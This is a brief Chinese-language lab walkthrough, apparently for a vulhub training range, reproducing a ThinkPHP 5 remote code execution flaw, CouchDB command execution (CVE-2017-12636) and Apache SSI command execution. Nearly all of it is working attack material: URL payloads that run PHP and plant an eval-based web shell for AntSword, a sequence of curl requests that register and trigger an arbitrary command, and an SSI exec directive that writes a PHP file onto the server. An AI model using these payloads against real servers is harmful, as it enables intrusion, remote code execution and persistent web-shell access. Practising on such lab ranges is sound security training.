一、Thinkphp5 2-rce远程代码执行漏洞
1.打开靶场环境
2、访问网页
3、构造payload
172.16.1.18:8080?s=/Index/index/L/${@phpinfo()}
4、写入一句话木马,使用蚁剑连接
172.16.1.18:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}
二、Couchdb 任意命令执行漏洞(CVE-2017-12636)
1、启动靶场环境,并在浏览器中访问
2、增加一个管理员用户
3、依次执行如下请求即可触发任意命令执行
curl -X PUT 'http://vulhub:vulhub@172.16.11.11:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@172.16.1.11:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@172.16.1.11:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
4、进入容器查看 /tmp/ 路径下 是否生成 success 文件
三、Apache SSI 远程命令执行漏洞
1、开启靶场环境并在浏览器中打开
2、写入一句话木马
<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->
3、上传文件,点击查看是否写入
4、进入容器查看
5、获取phpinfo